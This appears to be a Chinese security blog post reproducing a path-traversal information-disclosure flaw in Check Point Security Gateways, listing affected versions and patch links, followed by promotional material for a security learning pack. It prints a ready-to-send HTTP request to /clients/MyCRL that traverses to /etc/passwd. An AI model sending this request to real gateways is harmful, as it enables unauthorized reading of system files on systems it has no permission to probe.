0x00写在前面

  **本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!**

0x01漏洞介绍

Check Point Security Gateways是以色列Check Point公司的一个人工智能驱动的 NGFW 安全网关。

Check Point Security Gateways 存在安全漏洞。攻击者利用该漏洞可以获取敏感信息。

0x02影响版本

1、 Check Point Security Gateways R77.20 (EOL)

2、 Check Point Security Gateways R77.30 (EOL)

3、 Check Point Security Gateways R80.10 (EOL)

4、 Check Point Security Gateways R80.20 (EOL)

5、 Check Point Security Gateways R80.20.x

6、 Check Point Security Gateways R80.20SP (EOL)

7、 Check Point Security Gateways R80.30 (EOL)

8、 Check Point Security Gateways R80.30SP (EOL)

9、 Check Point Security Gateways R80.40 (EOL)

10、 Check Point Security Gateways R81

11、 Check Point Security Gateways R81.10

12、 Check Point Security Gateways R81.10.x

13、 Check Point Security Gateways R81.20

0x03漏洞复现

1.访问漏洞环境

2.对漏洞进行复现

POC (POT)

漏洞复现

POST /clients/MyCRL HTTP/1.1``Host: 127.0.0.1``User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36``Connection: close``Content-Length: 39``Content-Type: application/x-www-form-urlencoded``Accept-Encoding: gzip``   ``aCSHELL/../../../../../../../etc/passwd


 读取/etc/passwd成功

3.nuclei工具测试(漏洞存在)

Yakit工具加载nuclei文件测试漏洞存在

0x04修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://support.checkpoint.com/results/sk/sk182336``https://ti.qianxin.com/vulnerability/detail/354207``https://www.cnnvd.org.cn/home/loophole

弥天简介

学海浩茫,予以风动,必降弥天之润!弥天安全实验室成立于2019年2月19日,主要研究安全防守溯源、威胁狩猎、漏洞复现、工具分享等不同领域。目前主要力量为民间白帽子,也是民间组织。主要以技术共享、交流等不断赋能自己,赋能安全圈,为网络安全发展贡献自己的微薄之力。

口号 网安引领时代,弥天点亮未来

知识分享完了

喜欢别忘了关注我们哦~

学海浩茫,

予以风动,

必降弥天之润!

网络安全学习资源分享:

给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包,需要点击下方链接即可前往获取

读者福利 | CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享 (安全链接,放心点击)

👉1.成长路线图&学习规划👈

要学习一门新的技术,作为新手一定要先学习成长路线图,方向不对,努力白费。

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
在这里插入图片描述

在这里插入图片描述

👉2.网安入门到进阶视频教程👈

很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩。(全套教程文末领取哈)
在这里插入图片描述

在这里插入图片描述

👉3.SRC&黑客文档👈

大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录

SRC技术文籍:

在这里插入图片描述

黑客资料由于是敏感资源,这里不能直接展示哦!(全套教程文末领取哈)

👉4.护网行动资料👈

其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!

在这里插入图片描述

👉5.黑客必读书单👈

在这里插入图片描述

👉6.网络安全岗面试题合集👈

当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。
在这里插入图片描述
所有资料共282G,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,可以扫描下方二维码或链接免费领取~

读者福利 | CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享 (安全链接,放心点击)

# 安全 # 运维 # php # python # 开发语言
Logo
天启AI社区

GitCode 天启AI是一款由 GitCode 团队打造的智能助手,基于先进的LLM(大语言模型)与多智能体 Agent 技术构建,致力于为用户提供高效、智能、多模态的创作与开发支持。它不仅支持自然语言对话,还具备处理文件、生成 PPT、撰写分析报告、开发 Web 应用等多项能力,真正做到“一句话,让 Al帮你完成复杂任务”。

更多推荐

cover

【感知机】感知机(perceptron)学习算法例题及详解

avatar 天启AI社区
cover

AI云原生:数智化时代AI Agent加速落地的技术基石与实践指南(THS)

avatar 天启AI社区
cover

【AI论文】设计实验室:通过迭代检测与修正来设计幻灯片

avatar 天启AI社区